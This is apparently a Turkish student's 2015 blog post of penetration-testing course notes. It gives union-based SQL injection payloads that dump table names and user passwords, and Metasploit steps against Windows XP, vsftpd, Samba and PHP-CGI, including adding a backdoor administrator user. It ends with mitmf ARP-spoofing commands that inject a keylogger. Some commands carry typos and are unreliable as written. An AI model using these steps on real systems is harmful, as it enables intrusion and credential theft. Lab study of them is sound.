ben
OMÜ , Bilgisayar Mühendisliği, 13'
24 Ağustos 2015 Pazartesi
güvenlik
php web servis üzerine çalişan ve web site üzerinden olası açıklari öğreten bi kaynak. bunun için xampp servisi indirip kurun.
servisi başlatın: $ sudo /opt/lampp/lamp start
browser: http://127.0.0.1/dvwa/index.html
kullanıcı: admin
sifre: password1
- md5-cracker= sifreleri kıran aynı zamanda veritabanına ekleyen site
SQL Injection
- mysql zaafiyeti tum tablo bilgileri information_schema tablosunda tutulur.
web sitesinde bir kişi yada bir alan sorgulandiğinda url adresi /id=1 gibi bi değerle biriyorsa sql injectionla veritabanındaki diğer değerlere erişilebilir
sorgulama alanına giden değer örneğin öğrenci numarasıysa, formda ögrenci numarası alıyorsa, url adresi /no=123456 olarak bitiyorsa girilen alana aşağıdaki komutları yazarak vertabanı ile ilgili bilgilere ulaşmaya çalışalım
123456' union select 1,2,3 #
burda nodan sonra gelen ' sorguya devam etmemizi sağlar sonuna koyduğumuz # işareti ise gelen hataları yoksaymamızı sağlar
colon sayısını veritabanındaki colon sayısıyla eşitlememiz gerekiyor. veritabanında kac tane alan olduğunu bilmediğimiz için deneme-yanılma ile yazıyoruz. normal değer gelirse sayıyı tutturduk. 4 tane colon oldugunu yakaladık diyelim
1,2,3, column_name toplamlad 4 kolon
colon isimleri:
123456' union select 1,2,3, column_name from information_shema.columns#
tablo isimleri:
123456' union select 1,2,3, tables_name from information_shema.tables#
gelen tablolardan user_pwd tablosundan kullanıcı adı ve sifreleri alacağız
kullanıcı adı ve sifreleri:
123456' union select 1,name,sifre,4 from user_pwd #
concat: web sitesinden gelen iki değer varsa bizde iki değer döndürebiliriz bunun için concatı kullanırız
Sızma Testi- Zaafiyetler
Lİnux-kali sürümü kullanılıyor
burbsuite internetteki trafiği takip eder.
$ burpsuite
Makine tespiti için nmap = açık , çalışan port tarama aracı
Belirli port:
$ nmap -sS -Pn -n -p80
belirli aralıktaki iplerden sadece açık olanlar:
$ nmap -sS -Pn -n --open 197.0.0.1/24
- ctrl+x , tarama hangi aşamada?
Xp üzerinde paylasımdan kaynaklanan zafiyet
$msfconsole
$search ms08-067
ms08-067 yukarıdaki acık portlarda bulduk, xp ait zafiyet kodu
$use exploit/windows/smb
bu yol bir üst komut sonucunda konsolda göründü, ordan aldık
$show options
istediği parametreler
$ set RHOST hedefmakine_ipsi
hedef makine ipsi nmap ile sorguladığımızda zafiyetin sahip olduğu makineye ait ip adresini göstermiştik ordan aldık
$ check sistemde zafiyet varmı?yokmu?
$ exploit direk sisteme saldırır
makine consolu ekranımızda
--> pwd
--> screenshot ekrangörüntüsü alır
--> run vnc uzak masaüstü bağlantısı alır(arkada iz birakır)
--> shell windows msdos consoluna düştük
--> net user esra /add. yeni kullanıcı oluşturduk
--> net localgrup Administrator esra /add. admin yetkisinde kullanıcı oluşturduk
ctrl+c normal consol ekranına döndük
-->exit makineden çıktık
ftp Zaafiyet
$ nmap -sS -Pn -n --open sV 197.0.0.1/24
Çalışan servisleri versiyonlarıyla birlikte getirir.
listeden ftp 2.3.4 versiyonunu görduk. bu versiyonda zafiyet var
$msfconsol
$search msftpd
sadece ftp komutları çalışır, dosya yükleme,transfer, dosya içeriğini değiştirme
$use msftpd_den_gelen_path
exploit le başlayan arama sonucunda gelen path
$show option
$set RHOST ip_adress
$check
modül desteklemiyor
$ run
$exit makinede çıkar
Samba dosya paylaşımından kaynaklanana zafiyet
direk makineye girer
$ search usermap-script
$ use user_map_scritten_gelen_path
$ show option
$ set RHOST ip_adress
$ check/run
--> id rootsa herişlemi yapabilir
$exit
vnc zaafiyeti
vnc uzak masaüstü bağlanma programı
$vncvlewer ip:5900
5900 bu programın kullandığı port
$password şifreyi gir
php zaafiyeti
$ mtfconsol
$ search
$ use php_cgi_arg_injection
$ show option
$ set RHOST ip_adress
$ run
-->id
$exit
mitmf: ağdaki veri trafiğini izler ,(!, iz bırakır)
$mitmf --arp --spoof -i vlan0 --gateway 192.168.121.1 --jskeylogger
$mitmf --arp --spoof -i vlan0 --gateway 192.168.1.1 --jskeylogger